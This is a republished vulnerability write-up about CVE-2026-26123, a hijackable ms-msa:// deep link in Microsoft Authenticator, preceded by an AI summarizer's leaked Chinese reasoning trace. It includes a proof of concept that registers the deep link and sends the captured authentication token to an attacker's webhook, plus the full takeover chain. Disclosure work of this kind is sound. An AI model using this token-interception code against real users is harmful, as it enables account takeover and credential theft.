Microsoft Authenticator’s Unclaimed Deep Link: A Full Account Takeover Story (CVE-2026–26123)
嗯,用户让我用中文总结这篇文章,控制在一百个字以内,而且不需要特定的开头。首先,我需要快速浏览文章内容,抓住主要点。 文章讲的是微软 Authenticator 的一个漏洞,涉及到 deep link 的问题。攻击者利用这个漏洞可以劫持认证令牌,导致账户被完全接管。漏洞的原因是微软的 app 没有正确处理 deep link,导致恶意 app 可以拦截。 接下来,我需要将这些信息浓缩到100字以内。要包括漏洞的影响、原因以及修复措施。可能还需要提到 CVE 编号和影响范围。 最后,确保语言简洁明了,直接描述问题和结果,不使用复杂的术语。 </think> 微软 Authenticator 存在深链接漏洞,攻击者可利用恶意应用劫持认证令牌,导致账户完全接管。该漏洞源于微软未正确处理 ms-msa:// 深链接,允许恶意应用默认拦截并窃取敏感信息。修复需实施应用链接验证机制。 2026-3-27 11:1:49 Author: infosecwriteups.com(查看原文) 阅读量:1 收藏

Khaled Mohamed

When your authentication app becomes the weakest link: How an unclaimed deep link exposed millions of Microsoft accounts

The story of how I got a CVE acknowledgment in Microsoft, the second CVE ever in Microsoft Authenticator (CVE-2026–26123).

free link!

Press enter or click to view image in full size

TL;DR

Microsoft Authenticator’s ms-msa:// deep link, designed to securely onboard and sign in users or enable 2FA via QR codes, wasn't actually being claimed by the app itself. This oversight created a perfect storm: any malicious app could intercept authentication tokens, leading to complete account takeover—bypassing 2FA, password requirements, and every other security layer Microsoft had in place.

The Setup: When Convenience Meets Catastrophe

Picture this: You’re setting up Microsoft Authenticator on your phone. Microsoft’s web interface generates a QR code. You scan it with your phone’s native camera (like most people do), tap “Open link,” and…. You just handed your account to an attacker.

But here’s the kicker — you’d never know.

The Anatomy of a Deeplink Disaster

What’s a Deep Link ?

Android deep links let you bring users directly into your app content from links they have tapped, such as from web browsing, search, notifications and more.

Deep links are URLs with custom schemes that launch specific apps. You’ve seen them everywhere:

  • spotify://track/... opens Spotify
  • uber:// launches Uber
  • ms-msa:// should open Microsoft Authenticator

The key word here is should.

The Bug: A Case of Digital Abandonment

When Microsoft Authenticator generates a QR code for account setup, it creates a deep link like this:

ms-msa://code=M.C544_BL2.2.U.60e61ddd-1d08-127d-d783-bda9b7v&uaid=88498cfad78b4669aaec4b7a1c8&expires=3964722534

This token is gold. It’s a direct authentication credential that bypasses everything — 2FA, passwords, security questions. It’s the master key.

Now, here’s where things get wild: Microsoft Authenticator doesn’t actually listen to this deep link.

when the deep link is triggered from:

  • Native mobile QR scanner
  • Web page click
  • ADB implicit intent

The result? Error. The app doesn’t even open. Clicking on “Open Link” will open the attacker’s application.

The Exploit: Deep Link Hijacking 101

Since Microsoft Authenticator ghosted its own deep link, any app can claim it. No competition. No user prompt asking “Which app should handle this?” The malicious app wins by default.

This works on the latest Android and IOS versions, as well as the latest Microsoft Authenticator release.

Building the “Fake Authenticator”

Creating a proof-of-concept was almost embarrassingly simple:

Step 1: Register the abandoned deep link

<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="ms-msa" />
</intent-filter>

Step 2: Extract and exfiltrate the token

Intent intent = getIntent();
Uri data = intent.getData();
String token = data.getQueryParameter("code");
// Send to attacker's server
sendToWebhook(token);

Step 3: Profit

Get Khaled Mohamed’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

With the stolen token, an attacker can:

  1. Generate their own 2FA code from the Authenticator
  2. Login through the Authenticator
  3. Gain full account access

Services accessed through this compromise:

Email, Office, Microsoft Teams, OneDrive, Skype, Outlook, and etc

The Attack Chain

  1. Victim visits https://login.live.com/
  2. The legitimate Microsoft authenticator linking page
  3. QR code is generated with ms-msa:// deep link
  4. Victim scans with native camera (standard behavior)
  5. Phone shows “Open link” prompt
  6. Malicious app intercepts — no Microsoft Authenticator in sight
  7. Token sent to attacker’s server
  8. Attacker logs in

The Impact: Full Account Takeover

This isn’t a theoretical vulnerability. The impact is severe:

  • Scope: All Microsoft account services (Outlook, OneDrive, Azure, Office 365)
  • Bypass: 2FA, password requirements, security alerts
  • Detection: None. No notification to the victim

The attack requires minimal user interaction (scan a QR code — something users are trained to do) and zero suspicious permissions for the malicious app (just internet access).

The Fix: App Links Done Right

The solution is straightforward but requires proper implementation:

Just Implement App Link Verification.

Lessons for Security Engineers and developers

Audit your deep links, implement App Link verification, and remember that authentication flows deserve the highest scrutiny. After all, you can have the strongest lock in the world, but if you leave the key under the doormat, it doesn’t matter.

Critical and yet simple vulnerabilities still exists !

Timeline and Disclosure

This vulnerability was acknowledged (CVE-2026–26123), mitigated and responsibly disclosed to Microsoft Security Response Center (MSRC). The proof-of-concept demonstrates the issue without requiring extensive privileges — just internet permission — making it particularly dangerous.

Customers are advised to update to the latest version.


文章来源: https://infosecwriteups.com/microsoft-authenticators-unclaimed-deep-link-a-full-account-takeover-story-cve-2026-26123-e0409a920a02?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh